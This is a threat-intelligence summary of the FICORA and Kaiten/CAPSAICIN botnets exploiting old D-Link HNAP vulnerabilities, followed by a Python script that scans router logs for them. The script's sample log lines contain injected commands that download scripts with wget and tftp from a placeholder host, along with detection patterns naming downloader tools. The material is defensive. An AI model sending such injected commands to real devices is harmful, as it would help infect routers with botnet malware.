FICORA and Kaiten Botnets Exploit Old D-Link Vulnerabilities for Global Attacks

| Category | Details |
| --- | --- |
| Threat Actors | Botnet operators using a Mirai variant (FICORA) and a Kaiten variant (CAPSAICIN). |
| Campaign Overview | Surge in botnet attacks leveraging D-Link router vulnerabilities; FICORA targeting globally, CAPSAICIN focusing on East Asia (Japan, Taiwan). CAPSAICIN particularly active on Oct 21–22, 2024. |
| Target Regions | FICORA: Global; CAPSAICIN: East Asia (Japan, Taiwan). |
| Methodology | Exploits vulnerabilities in D-Link routers (via the HNAP interface), brute-force credential attacks, downloader scripts, and C2 communication for executing commands. |
| Products Targeted | D-Link routers, Linux-based systems. |
| Malware Reference | FICORA (Mirai variant) and CAPSAICIN (Kaiten variant). |
| Tools Used | Commands such as wget, ftpget, curl and tftp for downloading payloads; brute-force attack functions; malicious scripts (“multi” and “bins.sh”). |
| Vulnerabilities Exploited | HNAP weaknesses in D-Link routers (CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, CVE-2024-33112). |
| TTPs | Exploiting unpatched vulnerabilities, brute-force login attempts, killing rival botnet processes, leveraging DDoS techniques (UDP, TCP, DNS), maintaining persistence, and interaction via C2 servers. |
| Attribution | Botnet campaigns targeting vulnerable D-Link routers and leveraging decade-old vulnerabilities. |
| Recommendations | Regularly update router firmware and kernels, patch known vulnerabilities, use comprehensive monitoring, and implement strict access controls. |
| Source | The Hacker News |

Read full article: https://thehackernews.com/2024/12/ficora-and-kaiten-botnets-exploit-old-d.html

The above summary has been generated by an AI language model
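
One way to act on the monitoring recommendation above, as an added example that is not from the source article: a Python triage pass over router or proxy request logs that flags HNAP calls carrying the downloader tools and script names listed in the summary. The key=value log layout, the field names (`zone`, `soapaction`), the `/HNAP1/` path in the samples and the scoring weights are assumptions, and the sample records are constructed.

```python
import re

# Tool and script names come from the summary's "Tools Used" row.
DOWNLOADERS = ("wget", "ftpget", "curl", "tftp")
SCRIPTS = ("multi", "bins.sh")
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
TOOL_RE = re.compile(r"\b(" + "|".join(DOWNLOADERS) + r")\b", re.I)
SCRIPT_RE = re.compile(
    r"(?:^|[/\s])(" + "|".join(map(re.escape, SCRIPTS)) + r")(?![\w.])", re.I)

# Constructed sample records (assumed layout); documentation IP ranges, defanged URL.
SAMPLE_LOG = [
    'ts=2024-10-21T03:14:07Z src=198.51.100.23 zone=wan path=/HNAP1/ soapaction="GetDeviceSettings"',
    'ts=2024-10-21T03:15:42Z src=203.0.113.77 zone=wan path=/HNAP1/ soapaction="GetDeviceSettings wget hxxp://192.0.2.10/multi"',
    'ts=2024-10-21T03:16:01Z src=192.168.0.15 zone=lan path=/HNAP1/ soapaction="GetDeviceSettings"',
    'ts=2024-10-21T03:16:30Z src=203.0.113.80 zone=wan path=/index.html soapaction="-"',
    'ts=2024-10-22T11:02:19Z src=203.0.113.91 zone=wan path=/HNAP1/ soapaction="tftp 192.0.2.10 bins.sh"',
]

def parse_line(line):
    """Split one key=value log line into a dict, dropping surrounding quotes."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}

def score_request(rec):
    """Score one request: 0 means nothing of interest, higher is more suspicious."""
    if "hnap" not in rec.get("path", "").lower():
        return 0, []
    score, reasons = 0, []
    if rec.get("zone") == "wan":  # management interface exposed to the internet
        score += 1
        reasons.append("HNAP reachable from WAN")
    header = rec.get("soapaction", "")
    tool = TOOL_RE.search(header)
    if tool:  # a downloader name has no place in a management-call header
        score += 2
        reasons.append("downloader in header: " + tool.group(1).lower())
    script = SCRIPT_RE.search(header)
    if script:
        score += 2
        reasons.append("known script name: " + script.group(1).lower())
    return score, reasons

def triage(lines, threshold=3):
    """Return (src, score, reasons) for requests at or above the threshold."""
    scored = [(rec.get("src", "?"), *score_request(rec)) for rec in map(parse_line, lines)]
    return sorted((s for s in scored if s[1] >= threshold), key=lambda s: -s[1])
```

Records that score 1 (HNAP reachable from the WAN with no payload indicators) fall below the default threshold but still point at the access-control recommendation: the management interface should not be reachable from outside.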

Source: The Hacker News

Published on: December 27, 2024
